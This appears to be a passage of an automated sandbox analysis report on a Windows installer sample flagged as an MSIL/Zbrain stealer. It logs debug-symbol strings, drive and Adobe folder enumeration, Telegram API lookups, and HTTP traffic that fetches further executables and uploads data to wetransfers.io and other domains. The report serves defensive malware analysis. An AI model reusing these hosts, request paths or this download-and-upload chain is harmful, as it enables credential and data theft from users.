    Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: 1.exe, 1.exe, 00000000.00000000.1671191024.0000000000A19000.00000002.00000001.01000000.00000003.sdmp, 1.exe, 00000000.00000002.2583513984.0000000000A19000.00000002.00000001.01000000.00000003.sdmp, 1.exe, 00000004.00000002.2546889945.0000000000A19000.00000002.00000001.01000000.00000003.sdmp, 1.exe, 00000004.00000000.1876100284.0000000000A19000.00000002.00000001.01000000.00000003.sdmp
    Source: Binary string: System.Net.NameResolution.ni.pdb source: MainSoftware.exe, 00000009.00000002.2459749816.0000024A2D6ED000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459831114.0000024A2D701000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Claims\Release\net8.0\System.Security.Claims.pdb source: MainSoftware.exe, 00000009.00000002.2472010152.0000024A304D7000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472192330.0000024A304F1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488823990.0000021DEA337000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.DiagnosticSource.ni.pdb source: MainSoftware.exe, 00000009.00000002.2456750245.0000024A2CF93000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456841490.0000024A2CFC1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Numerics.Vectors\Release\net8.0\System.Numerics.Vectors.pdb source: MainSoftware.exe, 00000009.00000002.2459117236.0000024A2D5C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459006147.0000024A2D5BC000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Threading.ni.pdb source: MainSoftware.exe, 00000009.00000002.2452853423.0000020993BF1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457323456.0000024A2D22B000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Net/Release/net8.0-windows/System.Net.pdb source: MainSoftware.exe, 00000009.00000002.2459006147.0000024A2D5B7000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Sinks.Http/obj/Release/netstandard2.1/Serilog.Sinks.Http.pdb source: MainSoftware.exe, 00000009.00000002.2454027142.0000020995879000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455666591.0000024A2B101000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\Users\Admin\Distributor\Bundle Project\MSIInstaller\obj\Release\net8.0\win-x64\linked\MSIInstaller.pdb source: 1.exe, 00000000.00000003.1953629935.000000000C7C0000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: /_/artifacts/obj/System.Numerics/Release/net8.0-windows/System.Numerics.pdb source: MainSoftware.exe, 00000009.00000002.2454686724.0000024A2A3D0000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.InteropServices\Release\net8.0\System.Runtime.InteropServices.pdb source: MainSoftware.exe, 00000009.00000002.2458132025.0000024A2D3B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458048833.0000024A2D395000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5D5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.EventBasedAsync\Release\net8.0\System.ComponentModel.EventBasedAsync.pdb source: MainSoftware.exe, 00000009.00000002.2457807688.0000024A2D342000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.NetworkInformation.ni.pdb source: MainSoftware.exe, 00000009.00000002.2473142423.0000024A30971000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472689319.0000024A3095A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: #.Pdb source: 1.exe, 00000000.00000003.1953629935.000000000D3CB000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2460054054.0000024A2D721000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: wininet.pdb source: 1.exe, 00000000.00000003.1702765989.0000000009BF5000.00000004.00000020.00020000.00000000.sdmp, 1.exe, 00000004.00000003.1886484951.00000000075B7000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: System.Text.Encodings.Web.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D55A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458853975.0000024A2D571000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdb source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Collections.Concurrent.ni.pdb source: MainSoftware.exe, 00000009.00000002.2459307961.0000024A2D601000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5DD000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Diagnostics.Process.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457655754.0000024A2D2E3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457768047.0000024A2D311000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2507733360.0000021DED853000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457909781.0000024A2D361000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457807688.0000024A2D349000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2473396348.000001DD50A71000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NetworkInformation\Release\net8.0-windows\System.Net.NetworkInformation.pdb source: MainSoftware.exe, 00000009.00000002.2473142423.0000024A30971000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472689319.0000024A3095A000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Private.Uri.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457601992.0000024A2D271000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457473544.0000024A2D247000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections\Release\net8.0\System.Collections.pdb source: MainSoftware.exe, 00000009.00000002.2453520509.0000020993E71000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453570792.0000020993EA9000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Text.Encoding/Release/net8.0-windows/System.Text.Encoding.pdb source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D556000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\FileOperations.pdb source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: 1.exe, 00000000.00000003.1953629935.000000000C63F000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, MainSoftware.exe, 00000009.00000000.2403069778.00007FF7A2BF8000.00000002.00000001.01000000.0000000A.sdmp, SoftwareDistributor.exe
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256 source: MainSoftware.exe, 00000009.00000002.2456889306.0000024A2CFF9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456992556.0000024A2D041000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2485790532.0000021DE9E29000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Registry\Release\net8.0-windows\Microsoft.Win32.Registry.pdb source: MainSoftware.exe, 00000009.00000002.2458406613.0000024A2D411000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458284663.0000024A2D3F7000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.DiagnosticSource\Release\net8.0\System.Diagnostics.DiagnosticSource.pdb source: MainSoftware.exe, 00000009.00000002.2456750245.0000024A2CF93000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456841490.0000024A2CFC1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Collections.NonGeneric.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457944763.0000024A2D371000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458017065.0000024A2D381000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Threading.Timer/Release/net8.0-windows/System.Threading.Timer.pdb source: MainSoftware.exe, 00000009.00000002.2457323456.0000024A2D227000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: MainSoftware.exe, 00000009.00000002.2457655754.0000024A2D2E3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457768047.0000024A2D311000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2507733360.0000021DED853000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\ShortcutFlags.pdbE source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: /_/artifacts/obj/System.Diagnostics.Debug/Release/net8.0-windows/System.Diagnostics.Debug.pdb source: MainSoftware.exe, 00000009.00000002.2456750245.0000024A2CF90000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Overlapped\Release\net8.0\System.Threading.Overlapped.pdb source: MainSoftware.exe, 00000009.00000002.2459714008.0000024A2D6D1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459648718.0000024A2D6C2000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487984945.0000021DEA262000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Memory.ni.pdb source: MainSoftware.exe, 00000009.00000002.2472309573.0000024A3051C000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2472443393.0000024A30531000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\Microsoft.Win32.Primitives\Release\net8.0\Microsoft.Win32.Primitives.pdb source: MainSoftware.exe, 00000009.00000002.2458284663.0000024A2D3F3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459614069.0000024A2D6B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487954749.0000021DEA251000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Configuration.Abstractions/Release/net7.0/Microsoft.Extensions.Configuration.Abstractions.pdb source: MainSoftware.exe, 00000009.00000002.2455788652.0000024A2B160000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455841322.0000024A2B181000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483109037.0000021DE7F90000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/src/Serilog.Formatting.Compact/obj/Release/net8.0/Serilog.Formatting.Compact.pdb source: MainSoftware.exe, 00000009.00000002.2454007339.0000020995861000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453659363.0000020993F08000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdb source: MainSoftware.exe, 00000009.00000002.2459866027.0000024A2D713000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471490361.0000024A30481000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486428981.0000021DEA053000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488400492.0000021DEA2C1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdbSHA2560 source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D552000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2499468698.0000021DED3A2000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdb source: MainSoftware.exe, 00000009.00000002.2456889306.0000024A2CFF9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456992556.0000024A2D041000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2485790532.0000021DE9E29000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: System.Security.Cryptography.ni.pdb source: MainSoftware.exe, 00000009.00000002.2457056110.0000024A2D096000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457231097.0000024A2D161000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486216479.0000021DE9F91000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.AppContext/Release/net8.0-windows/System.AppContext.pdb source: MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5D5000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http.Json\Release\net8.0\System.Net.Http.Json.pdb source: MainSoftware.exe, 00000009.00000002.2458168635.0000024A2D3CA000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458251640.0000024A2D3E1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Runtime.InteropServices.ni.pdb source: MainSoftware.exe, 00000009.00000002.2458132025.0000024A2D3B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458048833.0000024A2D395000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Linq\Release\net8.0\System.Linq.pdbSHA256R source: MainSoftware.exe, 00000009.00000002.2453611805.0000020993ED3000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453831581.00000209957C1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2482080339.0000021DE7E51000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/Microsoft.Extensions.Primitives/Release/net7.0/Microsoft.Extensions.Primitives.pdb source: MainSoftware.exe, 00000009.00000002.2453861770.00000209957F2000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: 1.exe, 00000000.00000003.1697942133.0000000009B5F000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: 1.exe, 00000000.00000003.1953629935.000000000BE14000.00000004.00000020.00020000.00000000.sdmp, MainSoftware.exe, 00000009.00000002.2489752761.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp, MainSoftware.exe, 00000009.00000000.2402662552.00007FF7A2A1D000.00000002.00000001.01000000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encodings.Web\Release\net8.0\System.Text.Encodings.Web.pdb source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D55A000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458853975.0000024A2D571000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Http\Release\net8.0-windows\System.Net.Http.pdb source: MainSoftware.exe, 00000009.00000002.2455864746.0000024A2B198000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455976436.0000024A2B241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483529829.0000021DE8071000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.ComponentModel.Primitives\Release\net8.0\System.ComponentModel.Primitives.pdb source: MainSoftware.exe, 00000009.00000002.2457909781.0000024A2D361000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2457807688.0000024A2D349000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2473396348.000001DD50A71000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Sockets\Release\net8.0-windows\System.Net.Sockets.pdb source: MainSoftware.exe, 00000009.00000002.2459347730.0000024A2D621000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2459431055.0000024A2D661000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime.Intrinsics\Release\net8.0\System.Runtime.Intrinsics.pdb source: MainSoftware.exe, 00000009.00000002.2458900009.0000024A2D594000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2458980017.0000024A2D5A1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Http.ni.pdb source: MainSoftware.exe, 00000009.00000002.2455864746.0000024A2B198000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2455976436.0000024A2B241000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483529829.0000021DE8071000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Runtime\Release\net8.0\System.Runtime.pdb source: MainSoftware.exe, 00000009.00000002.2453468583.0000020993E61000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2453402629.0000020993E53000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: /_/artifacts/obj/System.Buffers/Release/net8.0-windows/System.Buffers.pdb source: MainSoftware.exe, 00000009.00000002.2459150036.0000024A2D5D9000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2487355105.0000021DEA179000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\SoftwareDetector.pdb source: 1.exe, 00000000.00000003.1697942133.00000000099F0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Text.Encoding.Extensions\Release\net8.0\System.Text.Encoding.Extensions.pdb source: MainSoftware.exe, 00000009.00000002.2458636879.0000024A2D552000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2499468698.0000021DED3A2000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: 1.exe, 00000000.00000003.1697942133.00000000099F0000.00000004.00001000.00020000.00000000.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Principal.Windows\Release\net8.0-windows\System.Security.Principal.Windows.pdb source: MainSoftware.exe, 00000009.00000002.2471636608.0000024A30491000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471927266.0000024A304B1000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488653015.0000021DEA2F1000.00000002.00000001.00040000.0000000A.sdmp
    Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.ThreadPool\Release\net8.0\System.Threading.ThreadPool.pdbSHA2560 source: MainSoftware.exe, 00000009.00000002.2459866027.0000024A2D713000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2471490361.0000024A30481000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2486428981.0000021DEA053000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2488400492.0000021DEA2C1000.00000020.00000001.00040000.0000000A.sdmp
    Source: Binary string: System.Net.Primitives.ni.pdb source: MainSoftware.exe, 00000009.00000002.2456147251.0000024A2B321000.00000020.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 00000009.00000002.2456047128.0000024A2B2FB000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483635124.0000021DE812B000.00000002.00000001.00040000.0000000A.sdmp, MainSoftware.exe, 0000000E.00000002.2483816012.0000021DE8151000.00000020.00000001.00040000.0000000A.sdmp
    Source: C:\Users\user\Desktop\1.exe | File opened: z:
    Source: C:\Users\user\Desktop\1.exe | File opened: x:
    Source: C:\Users\user\Desktop\1.exe | File opened: v:
    Source: C:\Users\user\Desktop\1.exe | File opened: t:
    Source: C:\Users\user\Desktop\1.exe | File opened: r:
    Source: C:\Users\user\Desktop\1.exe | File opened: p:
    Source: C:\Users\user\Desktop\1.exe | File opened: n:
    Source: C:\Users\user\Desktop\1.exe | File opened: l:
    Source: C:\Users\user\Desktop\1.exe | File opened: j:
    Source: C:\Users\user\Desktop\1.exe | File opened: h:
    Source: C:\Users\user\Desktop\1.exe | File opened: f:
    Source: C:\Users\user\Desktop\1.exe | File opened: b:
    Source: C:\Users\user\Desktop\1.exe | File opened: y:
    Source: C:\Users\user\Desktop\1.exe | File opened: w:
    Source: C:\Users\user\Desktop\1.exe | File opened: u:
    Source: C:\Users\user\Desktop\1.exe | File opened: s:
    Source: C:\Users\user\Desktop\1.exe | File opened: q:
    Source: C:\Users\user\Desktop\1.exe | File opened: o:
    Source: C:\Users\user\Desktop\1.exe | File opened: m:
    Source: C:\Users\user\Desktop\1.exe | File opened: k:
    Source: C:\Users\user\Desktop\1.exe | File opened: i:
    Source: C:\Users\user\Desktop\1.exe | File opened: g:
    Source: C:\Users\user\Desktop\1.exe | File opened: e:
    Source: C:\Program Files (x86)\Main\MainSoftware.exe | File opened: c:
    Source: C:\Users\user\Desktop\1.exe | File opened: a:
    Source: Yara match | File source: sslproxydump.pcap, type: PCAP
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_008B63A0 FindFirstFileW,GetLastError,FindClose | 0_2_008B63A0
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_008E2630 FindFirstFileW,FindClose,CloseHandle,CloseHandle | 0_2_008E2630
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_007754C0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError | 0_2_007754C0
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_008DC670 FindFirstFileW,FindClose | 0_2_008DC670
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_008C5040 FindFirstFileW,FindClose,FindClose | 0_2_008C5040
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_008B5A60 FindFirstFileW,FindFirstFileW,FindClose,FindClose | 0_2_008B5A60
    Source: C:\Users\user\Desktop\1.exe | Code function: 4_2_007754C0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError | 4_2_007754C0
    Source: C:\Users\user\Desktop\1.exe | Code function: 0_2_00794BB0 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError | 0_2_00794BB0
    Source: C:\Windows\System32\regsvr32.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
    Source: C:\Windows\System32\regsvr32.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
    Source: C:\Windows\System32\regsvr32.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
    Source: C:\Windows\System32\regsvr32.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
    Source: C:\Windows\System32\regsvr32.exe | File opened: C:\Users\user\AppData\Local\Adobe\
    Source: C:\Windows\System32\regsvr32.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 4x nop then push rbx | 15_2_00007FF7D3CE1FF0
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 4x nop then push rbx | 15_2_00007FF7D3CE1FF0
    Source: C:\Program Files (x86)\Main\Chop\Install.exe | Code function: 4x nop then mov dword ptr [rcx+48h], 80131500h | 15_2_00007FF7D3D5DD60

    Networking

    Source: Network traffic | Suricata IDS: 2829202 - Severity 1 - ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA : 192.168.2.4:49740 -> 104.21.80.136:443
    Source: Network traffic | Suricata IDS: 2829202 - Severity 1 - ETPRO MALWARE MSIL/Zbrain PUP/Stealer Installer UA : 192.168.2.4:49741 -> 104.21.80.136:443
    Source: C:\Windows\System32\regsvr32.exe | Network Connect: 104.21.59.228 443
    Source: C:\Windows\System32\regsvr32.exe | Network Connect: 149.154.167.220 443
    Source: C:\Windows\System32\regsvr32.exe | Network Connect: 34.160.111.145 80
    Source: unknown | DNS query: name: api.telegram.org
    Source: global traffic | HTTP traffic detected: POST /install/new HTTP/1.1 | Host: jonatechlab.com | X-API-Key: 123e4567-e89b-12d3-a456-426614174000 | Transfer-Encoding: chunked | Content-Type: application/json; charset=utf-8
    Source: global traffic | HTTP traffic detected: GET /install/whattoinstall/3a9ad13f-de6d-43be-b899-593fefcb45ef HTTP/1.1 | Host: jonatechlab.com | X-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global traffic | HTTP traffic detected: POST /logs/telemetry HTTP/1.1 | Host: jonatechlab.com | Content-Type: application/json | Content-Length: 660
    Source: global traffic | HTTP traffic detected: GET /install/getfiles/Chop/Install.exe HTTP/1.1 | Host: jonatechlab.com | X-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global traffic | HTTP traffic detected: POST /logs/telemetry HTTP/1.1 | Host: jonatechlab.com | Content-Type: application/json | Content-Length: 133
    Source: global traffic | HTTP traffic detected: POST /logs/telemetry HTTP/1.1 | Host: jonatechlab.com | Content-Type: application/json | Content-Length: 172
    Source: global traffic | HTTP traffic detected: GET /install/getfiles/Chop/Chop.pkg HTTP/1.1 | Host: jonatechlab.com | X-API-Key: 123e4567-e89b-12d3-a456-426614174000
    Source: global traffic | HTTP traffic detected: POST /logs/telemetry HTTP/1.1 | Host: jonatechlab.com | Content-Type: application/json | Content-Length: 375
    Source: global traffic | HTTP traffic detected: POST /logs/telemetry HTTP/1.1 | Host: swiftvantage.online | Content-Type: application/json | Content-Length: 1330
    Source: global traffic | HTTP traffic detected: POST /logs/telemetry HTTP/1.1 | Host: swiftvantage.online | Content-Type: application/json | Content-Length: 178
    Source: global traffic | HTTP traffic detected: POST /uplo.php HTTP/1.1 | Host: wetransfers.io | Accept: */* | Content-Length: 11232 | Content-Type: multipart/form-data; boundary=------------------------RPAKxtPhi0ELJgoR012pqZ
    Source: global traffic | HTTP traffic detected: POST /logs/telemetry HTTP/1.1 | Host: swiftvantage.online | Content-Type: application/json | Content-Length: 276
    Source: global traffic | HTTP traffic detected: POST /tools/create HTTP/1.1 | Host: swiftvantage.online | Content-Type: application/json; charset=utf-8 | Content-Length: 57
    Source: global traffic | HTTP traffic detected: GET /tools/domains HTTP/1.1 | Host: swiftvantage.online
    Source: global traffic | HTTP traffic detected: POST /logs/telemetry HTTP/1.1 | Host: swiftvantage.online | Content-Type: application/json | Content-Length: 114
    Source: global traffic | HTTP traffic detected: POST /logs/telemetry HTTP/1.1 | Host: swiftvantage.online | Content-Type: application/json | Content-Length: 1216
    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | Host: boldvertex.store
    Source: global traffic | HTTP traffic detected: GET /tools/config/installer/f86d096d-ce60-4b6e-ac60-096d2250693a HTTP/1.1 | Host: boldvertex.store
    Source: global traffic | HTTP traffic detected: POST /logs/telemetry HTTP/1.1 | Host: swiftvantage.online | Content-Type: application/json | Content-Length: 321
    Source: global traffic | HTTP traffic detected: GET /tools/files-to-delete/f86d096d-ce60-4b6e-ac60-096d2250693a HTTP/1.1 | Host: boldvertex.store
